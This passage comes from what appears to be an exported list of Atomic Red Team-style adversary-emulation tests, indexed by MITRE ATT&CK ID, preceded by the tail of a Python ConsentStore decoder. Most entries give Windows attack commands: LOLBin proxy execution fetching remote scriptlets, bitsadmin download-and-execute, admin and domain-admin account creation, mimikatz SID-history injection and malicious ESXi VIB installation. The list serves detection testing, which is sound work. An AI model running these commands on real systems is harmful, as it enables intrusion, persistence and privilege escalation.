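    entries encode the executable path with '#' in place of '\\'; packaged
    (Store) apps use their package family name instead."""
    _, _, rest = key.partition("\\ConsentStore\\")
    if not rest:
        raise ValueError("not a ConsentStore key")
    parts = rest.split("\\")
    device = parts[0]
    if len(parts) >= 3 and parts[1].lower() == "nonpackaged":
        return device, parts[2].replace("#", "\\")
    return device, (parts[1] if len(parts) > 1 else "")


def describe_usage(key: str, start_hex: str, stop_hex: Optional[str]) -> Dict[str, object]:
    """Build a usage record for one ConsentStore entry. An all-zero stop value is
    treated as 'still in use' (assumption: Windows writes 0 while the device is open)."""
    device, exe = parse_consent_store_key(key)
    start = decode_filetime(start_hex)
    stop = decode_filetime(stop_hex) if stop_hex and int(stop_hex, 16) != 0 else None
    return {
        "device": device,
        "executable": exe,
        "start": start,
        "stop": stop,
        "duration_s": (stop - start).total_seconds() if stop else None,
    }


if __name__ == "__main__":
    # The microphone test's key and values, as written by the reg add commands above.
    KEY = (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager"
           r"\ConsentStore\microphone\NonPackaged\C:#Windows#Temp#atomic.exe")
    rec = describe_usage(KEY, "a273b6f07104d601", "96ef514b7204d601")
    print(f"{rec['device']}: {rec['executable']} from {rec['start']:%Y-%m-%d %H:%M:%S} UTC "
          f"for {rec['duration_s']:.1f} s")
```

The two constants in the tests decode to a start of 2020-03-27 19:57:27 UTC and a stop about 152 seconds later, so a detection that only looks for the reg add command line would miss an attacker who plants plausible timestamps; comparing the decoded start time against process creation telemetry for the named executable is the more robust check.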
T1127 command_prompt windows Lolbin Jsc.exe compile javascript to exe
Trusted Developer Utilities Proxy Execution
Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe. https://lolbas-project.github.io/lolbas/Binaries/Jsc/ https://www.phpied.com/make-your-javascript-a-windows-exe/
copy "#(unknown)" %TEMP%\hello.js
#{jscpath}\#{jscname} %TEMP%\hello.js
T1127 command_prompt windows Lolbin Jsc.exe compile javascript to dll
Trusted Developer Utilities Proxy Execution
Use jsc.exe to compile javascript code stored in Library.js and output Library.dll. https://lolbas-project.github.io/lolbas/Binaries/Jsc/ https://www.phpied.com/make-your-javascript-a-windows-exe/
copy "#(unknown)" %TEMP%\LibHello.js
#{jscpath}\#{jscname} /t:library %TEMP%\LibHello.js
T1127.001 command_prompt windows MSBuild Bypass Using Inline Tasks (C#)
MSBuild
Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen.
#{msbuildpath}\#{msbuildname} "#(unknown)"
T1127.001 command_prompt windows MSBuild Bypass Using Inline Tasks (VB)
MSBuild
Executes the code in a project file using msbuild.exe. The default Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen.
#{msbuildpath}\#{msbuildname} "#(unknown)"
T1129 command_prompt windows ESXi - Install a custom VIB on an ESXi host
Shared Modules
An adversary can maintain persistence within an ESXi host by installing malicious vSphere Installation Bundles (VIBs). [Reference](https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence)
#{pscp_file} -pw #{vm_pass} #{vib_file} #{vm_user}@#{vm_host}:/tmp
echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{vib_install}"
T1134.005 command_prompt elevated windows Injection SID-History with mimikatz
SID-History Injection
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. Must be run on domain controller
#{mimikatz_path} "privilege::debug" "sid::patch" "sid::add /sid:#{sid_to_inject} /sam:#{sam_account_name}" "exit"
T1135 command_prompt windows Network Share Discovery command prompt
Network Share Discovery
Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host. Upon execution, available network shares will be displayed in the PowerShell session.
net view \\#{computer_name}
T1135 command_prompt windows View available share drives
Network Share Discovery
View information about all of the resources that are shared on the local computer. Upon execution, available share drives will be displayed in the PowerShell session.
net share
T1135 command_prompt windows Network Share Discovery via dir command
Network Share Discovery
Network Share Discovery utilizing the dir command at the command prompt. The computer IP variable may need to be modified to point to a different host IP. Upon execution, available network shares will be displayed in the command-line session.
dir \\#{computer_ip}\c$
dir \\#{computer_ip}\admin$
dir \\#{computer_ip}\IPC$
T1136.001 command_prompt elevated windows Create a new user in a command prompt
Local Account
Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the new account, run "net user" in PowerShell or CMD and observe that there is a new user named "T1136.001_CMD".
net user /add "#{username}" "#{password}"
T1136.001 command_prompt elevated windows Create a new Windows admin user
Local Account
Creates a new admin user in a command prompt.
net user /add "#{username}" "#{password}"
net localgroup administrators "#{username}" /add
T1136.002 command_prompt windows Create a new Windows domain admin user
Domain Account
Creates a new domain admin user in a command prompt.
net user "#{username}" "#{password}" /add /domain
net group "#{group}" "#{username}" /add /domain
T1136.002 command_prompt windows Create a new account similar to ANONYMOUS LOGON
Domain Account
Create a new account similar to ANONYMOUS LOGON in a command prompt.
net user "#{username}" "#{password}" /add /domain
T1137 command_prompt windows Office Application Startup - Outlook as a C2
Office Application Startup
As outlined in MDSEC's blog post https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ it is possible to use an Outlook macro as a way to achieve persistence and execute arbitrary commands. This transforms Outlook into a C2. To achieve this, two things must happen on the system: the macro security registry value must be set to '1', and a file called VbaProject.OTM must be created in the Outlook folder.
reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /v Level /t REG_DWORD /d 1 /f
mkdir  %APPDATA%\Microsoft\Outlook\ >nul 2>&1
echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM
T1137.004 command_prompt windows Install Outlook Home Page Persistence
Outlook Home Page
This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve a URL containing a malicious payload every time the targeted folder is viewed. Triggering the payload requires manually opening Outlook and viewing the targeted folder (e.g. Inbox).
reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f
T1140 command_prompt windows Deobfuscate/Decode Files Or Information
Deobfuscate/Decode Files or Information
Encode/decode an executable. Upon execution, a file named T1140_calc_decoded.exe will be placed in the temp folder.
certutil -encode #{executable} %temp%\T1140_calc.txt
certutil -decode %temp%\T1140_calc.txt %temp%\T1140_calc_decoded.exe
T1140 command_prompt windows Certutil Rename and Decode
Deobfuscate/Decode Files or Information
Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)
copy %windir%\system32\certutil.exe %temp%\tcm.tmp
%temp%\tcm.tmp -encode #{executable} %temp%\T1140_calc2.txt
%temp%\tcm.tmp -decode %temp%\T1140_calc2.txt %temp%\T1140_calc2_decoded.exe
T1140 command_prompt windows Expand CAB with expand.exe
Deobfuscate/Decode Files or Information
Uses expand.exe to extract a file from a CAB created locally. This simulates adversarial use of expand on cabinet archives. Upon success, art-expand-source.txt is extracted next to the CAB.
mkdir "#{output_dir}" >nul 2>&1
echo hello from atomic red team > "PathToAtomicsFolder\T1140\src\art-expand-source.txt"
makecab "PathToAtomicsFolder\T1140\src\art-expand-source.txt" "#{cab_path}"
pushd "#{output_dir}"
expand "#{cab_path}" -F:* .
popd
T1195 command_prompt windows Octopus Scanner Malware Open Source Supply Chain
Supply Chain Compromise
This test simulates the Octopus adversary dropping the RAT dropper ExplorerSync.db. [octopus-scanner-malware-open-source-supply-chain](https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain/) [the-supreme-backdoor-factory](https://www.dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/)
copy %temp%\ExplorerSync.db %temp%\..\Microsoft\ExplorerSync.db
schtasks /create /tn ExplorerSync /tr "javaw -jar %temp%\..\Microsoft\ExplorerSync.db" /sc MINUTE /f
T1197 command_prompt windows Bitsadmin Download (cmd)
BITS Jobs
This test simulates an adversary leveraging bitsadmin.exe to download and execute a payload
bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file}
T1197 command_prompt windows Persist, Download, & Execute
BITS Jobs
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer and execute a payload in multiple steps. Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsadmin to run an executable. This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of "svchost.exe" and an Initiating Process Command Line of "svchost.exe -k netsvcs -p -s BITS". This job will remain in the BITS queue until complete or for up to 90 days by default if not removed.
bitsadmin.exe /create #{bits_job_name}
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL
bitsadmin.exe /resume #{bits_job_name}
ping -n 5 127.0.0.1 >nul 2>&1
bitsadmin.exe /complete #{bits_job_name}
T1197 command_prompt windows Bits download using desktopimgdownldr.exe (cmd)
BITS Jobs
This test simulates using desktopimgdownldr.exe to download a malicious file instead of a desktop or lockscreen background image. The process that actually makes the TCP connection and creates the file on the disk is a svchost process ("-k netsvc -p -s BITS") and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr
T1201 command_prompt windows Examine local password policy - Windows
Password Policy Discovery
Lists the local password policy to console on Windows.
net accounts
T1201 command_prompt windows Examine domain password policy - Windows
Password Policy Discovery
Lists the domain password policy to console on Windows.
net accounts /domain
T1201 command_prompt elevated windows Use of SecEdit.exe to export the local security policy (including the password policy)
Password Policy Discovery
SecEdit.exe can be used to export the current local security policy applied to a host. [Reference](https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d)
secedit.exe /export /areas SECURITYPOLICY /cfg output_mysecpol.txt
T1202 command_prompt windows Indirect Command Execution - pcalua.exe
Indirect Command Execution
The Program Compatibility Assistant (pcalua.exe) may invoke the execution of programs and commands from a Command-Line Interface. [Reference](https://twitter.com/KyleHanslovan/status/912659279806640128) Upon execution, calc.exe should open.
pcalua.exe -a #{process}
pcalua.exe -a #{payload_path}
T1202 command_prompt windows Indirect Command Execution - forfiles.exe
Indirect Command Execution
forfiles.exe may invoke the execution of programs and commands from a Command-Line Interface. [Reference](https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Forfiles.yml) "This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe" Upon execution calc.exe will be opened.
forfiles /p c:\windows\system32 /m notepad.exe /c #{process}
T1202 command_prompt windows Indirect Command Execution - conhost.exe
Indirect Command Execution
conhost.exe refers to a host process for the console window. It provides an interface between the command prompt and Windows Explorer. Executing it through the command line can create process ancestry anomalies. [Reference](http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/)
conhost.exe "#{process}"
T1204.002 command_prompt windows OSTap Payload Download
Malicious File
Uses cscript //E:jscript to download a file
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile('ostapout.txt', 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}
T1216 command_prompt windows SyncAppvPublishingServer Signed Script PowerShell Command Execution
System Script Proxy Execution
Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command. Upon execution, calc.exe will be launched.
C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
T1216 command_prompt windows manage-bde.wsf Signed Script Command Execution
System Script Proxy Execution
Executes the signed manage-bde.wsf script with options to execute an arbitrary command.
set comspec=#{command_to_execute}
cscript %windir%\System32\manage-bde.wsf
T1216.001 command_prompt windows PubPrn.vbs Signed Script Bypass
PubPrn
Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.
cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"
T1217 command_prompt windows List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt
Browser Information Discovery
Searches for Google Chrome's and Edge Chromium's Bookmarks file (on Windows distributions) that contains bookmarks. Upon execution, paths that contain bookmark files will be displayed.
where /R C:\Users\ Bookmarks
T1217 command_prompt windows List Mozilla Firefox bookmarks on Windows with command prompt
Browser Information Discovery
Searches for the Mozilla Firefox bookmarks file (on Windows distributions) that contains bookmarks in a SQLite database. Upon execution, paths that contain bookmark files will be displayed.
where /R C:\Users\ places.sqlite
T1217 command_prompt windows List Internet Explorer Bookmarks using the command prompt
Browser Information Discovery
This test will list the bookmarks for Internet Explorer that are found in the Favorites folder.
dir /s /b %USERPROFILE%\Favorites
T1218 command_prompt elevated windows mavinject - Inject DLL into running process
System Binary Proxy Execution
Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.
mavinject.exe #{process_id} /INJECTRUNNING "#{dll_payload}"
T1218 command_prompt windows Register-CimProvider - Execute evil dll
System Binary Proxy Execution
Execute an arbitrary DLL. Requires at least Windows 8/2012. Also note this DLL can be served up via SMB.
C:\Windows\SysWow64\Register-CimProvider.exe -Path "#{dll_payload}"
T1218 command_prompt windows InfDefaultInstall.exe .inf Execution
System Binary Proxy Execution
Test execution of a .inf using InfDefaultInstall.exe. Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml
InfDefaultInstall.exe "#{inf_to_execute}"
T1218 command_prompt windows ProtocolHandler.exe Downloaded a Suspicious File
System Binary Proxy Execution
Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.
FOR /F "tokens=2*" %a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%b
call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
T1218 command_prompt windows Load Arbitrary DLL via Wuauclt (Windows Update Client)
System Binary Proxy Execution
This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched. See https://dtm.uk/wuauclt/
wuauclt.exe /UpdateDeploymentProvider "#{arbitrary_dll}" /RunHandlerComServer
T1218 command_prompt windows Lolbin Gpscript logon option
System Binary Proxy Execution
Executes logon scripts configured in Group Policy. https://lolbas-project.github.io/lolbas/Binaries/Gpscript/ https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
Gpscript /logon
T1218 command_prompt windows Lolbin Gpscript startup option
System Binary Proxy Execution
Executes startup scripts configured in Group Policy. https://lolbas-project.github.io/lolbas/Binaries/Gpscript/ https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
Gpscript /startup
T1218 command_prompt windows Lolbas ie4uinit.exe use as proxy
System Binary Proxy Execution
Executes commands from a specially prepared ie4uinit.inf file. PoC from: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ Reference: https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/
copy #{Path_ie4uinit} %TEMP%\ie4uinit.exe
copy "#{Path_inf}" %TEMP%\ieuinit.inf
%TEMP%\ie4uinit.exe -BaseSettings
T1218 command_prompt windows Provlaunch.exe Executes Arbitrary Command via Registry Key
System Binary Proxy Execution
Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command. References: https://twitter.com/0gtweet/status/1674399582162153472 and https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/ Registry keys are deleted after successful execution.
reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0
reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe
c:\windows\system32\provlaunch.exe LOLBin
T1218.001 command_prompt windows Compiled HTML Help Local Payload
Compiled HTML File
Uses hh.exe to execute a local compiled HTML Help payload. Upon execution, calc.exe will open.
hh.exe "#{local_chm_file}"
T1218.001 command_prompt windows Compiled HTML Help Remote Payload
Compiled HTML File
Uses hh.exe to execute a remote compiled HTML Help payload. Upon execution, an error is displayed saying the file cannot be opened.
hh.exe #{remote_chm_file}
T1218.001 command_prompt windows Decompile Local CHM File
Compiled HTML File
Uses hh.exe to decompile a local compiled HTML Help file. Upon successful execution, the CHM file will be decompiled to disk. Reference: https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/
hh.exe -decompile %temp% "#{local_chm_file}"
T1218.002 command_prompt windows Control Panel Items
Control Panel
This test simulates an adversary leveraging control.exe. Upon execution, calc.exe will be launched.
control.exe "#{cpl_file_path}"
T1218.003 command_prompt windows CMSTP Executing Remote Scriptlet
CMSTP
Adversaries may supply CMSTP.exe with INF files infected with malicious commands.
cmstp.exe /s "#{inf_file_path}"
T1218.003 command_prompt windows CMSTP Executing UAC Bypass
CMSTP
Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file.
cmstp.exe /s "#{inf_file_uac}" /au
T1218.005 command_prompt windows Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
Mshta
Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched.
mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
T1218.005 command_prompt windows Mshta executes VBScript to execute malicious command
Mshta
Run a local VB script to run a local user enumeration PowerShell command. This attempts to emulate what FIN7 does with this technique, which is using mshta.exe to execute VBScript to execute malicious code on victim systems. Upon execution, a new PowerShell window will be opened that displays user information.
mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file PathToAtomicsFolder\T1218.005\src\powershell.ps1"":close")
T1218.005 command_prompt windows Mshta used to Execute PowerShell
Mshta
Use Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary.
mshta.exe "about:<hta:application><script language="VBScript">Close(Execute("CreateObject(""Wscript.Shell"").Run%20""powershell.exe%20-nop%20-Command%20Write-Host%20#{message};Start-Sleep%20-Seconds%20#{seconds_to_sleep}"""))</script>'"
T1218.007 command_prompt windows Msiexec.exe - Execute Local MSI file with embedded JScript
Msiexec
Executes an MSI containing embedded JScript code using msiexec.exe
#{msi_exe} /q /#{action} "#{msi_payload}"
T1218.007 command_prompt windows Msiexec.exe - Execute Local MSI file with embedded VBScript
Msiexec
Executes an MSI containing embedded VBScript code using msiexec.exe
#{msi_exe} /q /#{action} "#{msi_payload}"
T1218.007 command_prompt windows Msiexec.exe - Execute Local MSI file with an embedded DLL
Msiexec
Executes an MSI containing an embedded DLL using msiexec.exe
#{msi_exe} /q /#{action} "#{msi_payload}"
T1218.007 command_prompt windows Msiexec.exe - Execute Local MSI file with an embedded EXE
Msiexec
Executes an MSI containing an embedded EXE using msiexec.exe
#{msi_exe} /q /#{action} "#{msi_payload}"
T1218.007 command_prompt windows Msiexec.exe - Execute the DllRegisterServer function of a DLL
Msiexec
Loads a DLL into msiexec.exe and calls its DllRegisterServer function. Note: the DLL included in the "bin" folder is only built for 64-bit, so this won't work on a 32-bit OS.
#{msi_exe} /y "#{dll_payload}"
T1218.007 command_prompt windows Msiexec.exe - Execute the DllUnregisterServer function of a DLL
Msiexec
Loads a DLL into msiexec.exe and calls its DllUnregisterServer function. Note: the DLL included in the "bin" folder is only built for 64-bit, so this won't work on a 32-bit OS.
#{msi_exe} /z "#{dll_payload}"
T1218.007 command_prompt windows Msiexec.exe - Execute Remote MSI file
Msiexec
Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI executes a built-in JScript payload that launches powershell.exe.
#{msi_exe} /q /i "#{msi_payload}"
T1218.008 command_prompt windows Odbcconf.exe - Execute Arbitrary DLL
Odbcconf
Execute arbitrary DLL file stored locally.
odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
T1218.008 command_prompt windows Odbcconf.exe - Load Response File
Odbcconf
Execute arbitrary response file that will spawn PowerShell.exe. Source files: https://github.com/woanware/application-restriction-bypasses
cd "#{rsp_file_path}"
odbcconf.exe -f "#{rsp_file_name}"
T1218.009 command_prompt windows Regasm Uninstall Method Call Test
Regsvcs/Regasm
Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn't really execute either." will be displayed.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library "#{source_file}"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}
T1218.010 command_prompt windows Regsvr32 local COM scriptlet execution
Regsvr32
Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.
#{regsvr32path}\#{regsvr32name} /s /u /i:"#(unknown)" scrobj.dll
T1218.010 command_prompt windows Regsvr32 remote COM scriptlet execution
Regsvr32
Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by Windows Defender; disable Windows Defender real-time protection to fix it. Upon execution, calc.exe will be launched.
#{regsvr32path}\#{regsvr32name} /s /u /i:#{url} scrobj.dll
T1218.010 command_prompt windows Regsvr32 local DLL execution
Regsvr32
Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.
IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}\#{regsvr32name} /s #{dll_name} )
T1218.010 command_prompt windows Regsvr32 Registering Non DLL
Regsvr32
Replicates observed Gozi maldoc behavior of registering a DLL with an altered extension.
#{regsvr32path}\#{regsvr32name} /s #{dll_file}
T1218.010 command_prompt windows Regsvr32 Silent DLL Install Call DllRegisterServer
Regsvr32
Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer.
#{regsvr32path}\#{regsvr32name} /s /i "#{dll_name}"
T1218.011 command_prompt windows Rundll32 execute JavaScript Remote Payload With GetObject
Rundll32
Test execution of a remote script using rundll32.exe. Upon execution, notepad.exe will be opened. This has been used by Win32/Poweliks malware and works as described [here](https://www.stormshield.com/news/poweliks-command-line-confusion/). Note: The GetObject function is no longer supported in Internet Explorer v9 (2011) and later, so this technique would only work where very old versions of IE are installed.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();window.close();
T1218.011 command_prompt windows Rundll32 execute VBscript command
Rundll32
Test execution of a command using rundll32.exe and VBScript in a similar manner to the JavaScript test. Technique documented by Hexacorn: http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/ Upon execution, calc.exe will be launched.
rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
T1218.011 command_prompt windows Rundll32 execute VBscript command using Ordinal number
Rundll32
Test execution of a command using rundll32.exe and VBScript in a similar manner to the JavaScript test. Technique documented by Hexacorn: http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/ Upon execution, calc.exe will be launched.
rundll32 vbscript:"\..\mshtml,#135 "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
T1218.011 command_prompt windows Rundll32 advpack.dll Execution
Rundll32
Test execution of a command using rundll32.exe with advpack.dll. Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml Upon execution, calc.exe will be launched.
rundll32.exe advpack.dll,LaunchINFSection "#{inf_to_execute}",DefaultInstall_SingleUser,1,
T1218.011 command_prompt windows Rundll32 ieadvpack.dll Execution
Rundll32
Test execution of a command using rundll32.exe with ieadvpack.dll. Upon execution, calc.exe will be launched. Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml
rundll32.exe ieadvpack.dll,LaunchINFSection "#{inf_to_execute}",DefaultInstall_SingleUser,1,
T1218.011 command_prompt windows Rundll32 syssetup.dll Execution
Rundll32
Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened. Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml
rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 "#{inf_to_execute}"
T1218.011 command_prompt windows Rundll32 setupapi.dll Execution
Rundll32
Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a window saying "installation failed" will be opened. Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 "#{inf_to_execute}"
T1218.011 command_prompt windows Execution of HTA and VBS Files using Rundll32 and URL.dll
Rundll32
IcedID uses this TTP as follows: rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta; Trickbot uses this TTP as follows: rundll32.exe URL.dll,FileProtocolHandler C:\..\Detail\akteullen.vbs. In this atomic, the sample HTA file opens the calculator and the VBS file shows a message dialog with "rundll32 spawned wscript".
rundll32.exe url.dll,OpenURL "PathToAtomicsFolder\T1218.011\src\index.hta"
rundll32.exe URL.dll,FileProtocolHandler "PathToAtomicsFolder\T1218.011\src\akteullen.vbs"
T1218.011 command_prompt windows Launches an executable using Rundll32 and pcwutl.dll
Rundll32
Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable.
rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch}
T1218.011 command_prompt windows Rundll32 with Ordinal Value
Rundll32
Rundll32.exe loading a DLL using ordinal value #2 to call DllRegisterServer. Upon successful execution, calc.exe will spawn.
rundll32.exe "#{input_file}",#2
T1218.011 command_prompt windows Rundll32 with Control_RunDLL
Rundll32
Rundll32.exe loading a DLL with 'control_rundll' within the command line, loading a .cpl or another file type related to CVE-2021-40444.
rundll32.exe shell32.dll,Control_RunDLL "#{input_file}"
T1218.011 command_prompt windows Rundll32 with desk.cpl
Rundll32
Rundll32.exe loading an executable renamed as .scr using desk.cpl. Reference: [LOLBAS - Libraries/Desk](https://lolbas-project.github.io/lolbas/Libraries/Desk/). Sigma rules: [SCR File Write Event](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/file_event/file_event_win_new_src_file.yml), [Rundll32 InstallScreenSaver Execution](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml)
copy #{exe_to_launch} not_an_scr.scr
rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr
T1218.011 command_prompt windows Running DLL with .init extension and function
Rundll32
This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up. DLL created with the AtomicTestHarnesses Portable Executable Builder script.
rundll32.exe #{dll_file},krnl
T1218.011 command_prompt windows Rundll32 execute command via FileProtocolHandler
Rundll32
Test execution of a command using rundll32.exe and the FileProtocolHandler technique. Upon execution, calc.exe will be launched. This technique is documented by Levan Abesadze: https://medium.com/@Wolverineisstillalive/system-binary-proxy-execution-rundll32-bypass-method-790871e1f2b7
rundll32.exe url.dll,FileProtocolHandler #{command_to_execute}
T1220 command_prompt windows MSXSL Bypass using local files
XSL Script Processing
Executes the code specified within an XSL script tag during XSL transformation using a local payload. Requires download of MSXSL, which is no longer available from Microsoft (available via the Internet Archive: https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 ). Opens Calculator.exe when the test executes successfully, with AV turned off.
"#{msxsl_exe}" "#{xmlfile}" "#{xslfile}"
T1220 command_prompt windows MSXSL Bypass using remote files
XSL Script Processing
Executes the code specified within an XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL.exe, which is no longer available from Microsoft (available via the Internet Archive: https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 ). Opens Calculator.exe when the test executes successfully, with AV turned off.
"#{msxsl_exe}" "#{xmlfile}" "#{xslfile}"
T1220 command_prompt windows WMIC bypass using local XSL file
XSL Script Processing
Executes the code specified within an XSL script using a local payload.
wmic #{wmic_command} /FORMAT:"#{local_xsl_file}"
T1220 command_prompt windows WMIC bypass using remote XSL file
XSL Script Processing
Executes the code specified within an XSL script using a remote payload. Opens Calculator.exe when the test executes successfully, with AV turned off.
wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}"
T1221 command_prompt windows WINWORD Remote Template Injection
Template Injection
Open a .docx file that loads a remote .dotm macro-enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm and executes the code specified within the .dotm template. Requires download of WINWORD, found in Microsoft Office at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. The default .docx file opens Calculator.exe when the test executes successfully, with AV turned off.
start "#{docx_file}"
T1222 command_prompt elevated windows Enable Local and Remote Symbolic Links via fsutil
File and Directory Permissions Modification
Use fsutil to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths. [reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/)
fsutil behavior set SymlinkEvaluation R2L:1
fsutil behavior set SymlinkEvaluation R2R:1
T1222 command_prompt elevated windows Enable Local and Remote Symbolic Links via reg.exe
File and Directory Permissions Modification
